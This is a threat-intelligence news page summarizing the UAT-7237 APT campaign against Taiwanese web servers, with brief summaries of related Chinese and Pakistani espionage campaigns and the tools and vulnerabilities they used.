CyberHappenings logo
☰
🏠 Home πŸ“‚ Browse ℹ️ About

Track cybersecurity events as they unfold. Sourced timelines, daily updates. Fast, privacy‑respecting. No ads, no tracking.

UAT-7237 APT Group Targets Taiwan Web Servers with Customized Open-Source Tools

First reported
Last updated
πŸ“° 1 unique sources, 1 articles

Summary

Hide β–²

A Chinese-speaking APT group, UAT-7237, has been targeting web infrastructure entities in Taiwan since at least 2022. The group uses customized open-source tools to establish long-term access in high-value environments. UAT-7237 is believed to be a sub-group of UAT-5918, which has been active since 2023. The attacks exploit known security flaws in unpatched servers, followed by reconnaissance and the deployment of custom malware, including a shellcode loader called SoundBill and Cobalt Strike. The group also uses SoftEther VPN clients and RDP for persistent access and JuicyPotato and Mimikatz for privilege escalation and credential extraction. The group has been observed making Windows Registry changes to disable User Account Control (UAC) and store cleartext passwords. They have also been seen using FScan to identify open ports and specifying Simplified Chinese as the preferred display language in their VPN client's configuration file.

Timeline

  1. 15.08.2025 19:20 πŸ“° 1 articles Β· ⏱ 1mo ago

    UAT-7237 APT Group Targets Taiwan Web Servers

    A Chinese-speaking APT group, UAT-7237, has been targeting web infrastructure entities in Taiwan since at least 2022. The group uses customized open-source tools to establish long-term access in high-value environments. UAT-7237 is believed to be a sub-group of UAT-5918, which has been active since 2023. The attacks exploit known security flaws in unpatched servers, followed by reconnaissance and the deployment of custom malware, including a shellcode loader called SoundBill and Cobalt Strike. The group also uses SoftEther VPN clients and RDP for persistent access and JuicyPotato and Mimikatz for privilege escalation and credential extraction.

    Show sources
    Open in new tab

Information Snippets

Similar Happenings

Chinese State-Sponsored Actors Targeting Global Critical Infrastructure

Chinese state-sponsored Advanced Persistent Threat (APT) actors, specifically the Salt Typhoon group, are conducting a sustained campaign to gain long-term access to critical infrastructure networks worldwide. These actors exploit vulnerabilities in routers and other edge network devices used by telecommunications providers, ISPs, and other infrastructure operators. The campaign targets telecommunications, transportation, lodging, government, and military networks. The actors employ tactics to evade detection and maintain persistent access, posing a significant threat to national and economic security. The advisory provides actionable guidance to help organizations strengthen their defenses and protect critical systems. The campaign has targeted at least 600 organizations across 80 countries, including 200 in the U.S. The advisory details how state-backed threat actors, including Salt Typhoon, penetrate networks around the world and how defenders can protect their own environments. The advisory tracks this cluster of activity to multiple advanced persistent threats (APTs), though it partially overlaps with Salt Typhoon. The advisory notes that the actors have had considerable success exploiting publicly known vulnerabilities, including Ivanti Connect Secure, Ivanti Policy Secure, Palo Alto Networks PAN-OS, and Cisco IOS XE vulnerabilities. The advisory suspects that the APT actors may target other devices, including Fortinet firewalls, Juniper firewalls, Microsoft Exchange, Nokia routers and switches, Sierra Wireless devices, and Sonicwall firewalls. The actors use multiple tactics to maintain persistence, including modifying Access Control Lists (ACLs), opening standard and non-standard ports, enabling SSH servers, and creating tunnels over protocols. The actors target protocols and infrastructure involved in authentication, such as Terminal Access Controller Access Control System Plus (TACACS+), to facilitate lateral movement across network devices. The advisory provides extensive recommendations for mitigating these threats, including monitoring network device configuration changes, auditing network services and tunnels, and checking logs for integrity. The advisory highlights a critical shift from Chinese state-sponsored activity from being purely espionage to gaining long-term access for potential disruption. 45 previously unreported domains associated with Salt Typhoon and UNC4841 have been discovered, dating back to May 2020. The oldest domain identified is onlineeylity[.]com, registered on May 19, 2020. The domains were registered using Proton Mail email addresses and fake personas. The domains point to high-density and low-density IP addresses, with the earliest activity traced back to October 2021. The domains are linked to Chinese cyber espionage campaigns, with potential overlaps between Salt Typhoon and UNC4841.

Open in new tab

APT36 leverages Linux .desktop files for malware deployment in ongoing espionage campaign

APT36, a Pakistani threat actor also known as Transparent Tribe, is exploiting Linux .desktop files to install malware in attacks targeting government and defense entities in India. The campaign, active since August 1, 2025, aims at data exfiltration and maintaining persistent access. The attacks use phishing emails to deliver ZIP archives containing malicious .desktop files disguised as PDFs. The malware, a Go-based ELF executable, establishes persistence and communicates via a WebSocket channel for command and control. The campaign also targets Windows and BOSS Linux systems, using decoy PDFs and anti-debugging techniques to evade detection.

Open in new tab

Chinese APTs Murky Panda, Genesis Panda, and Glacial Panda escalate cloud and telecom espionage

Murky Panda, also known as Silk Typhoon, Genesis Panda, and Glacial Panda, three China-nexus cyber espionage groups, have escalated their activities targeting cloud and telecom sectors. Murky Panda exploits trusted cloud relationships and zero-day vulnerabilities to breach enterprise networks. Genesis Panda targets cloud service providers to expand access and establish persistence. Glacial Panda targets telecommunications organizations to exfiltrate call detail records and related communications telemetry. The groups leverage various TTPs, including exploiting internet-facing appliances, known vulnerabilities, and living-off-the-land techniques. Their operations are driven by intelligence gathering and maintaining stealth and persistence. Murky Panda has been observed exploiting the CVE-2025-0282 vulnerability in Ivanti Pulse Connect VPN, zero-day vulnerabilities in SaaS providers' cloud environments, and delegated administrative privileges (DAP) in Microsoft cloud solution providers to gain Global Administrator rights across all downstream tenants. The group uses compromised SOHO devices as proxy servers to blend malicious traffic with normal traffic and deploys web shells like Neo-reGeorg and China Chopper to establish persistence.

Open in new tab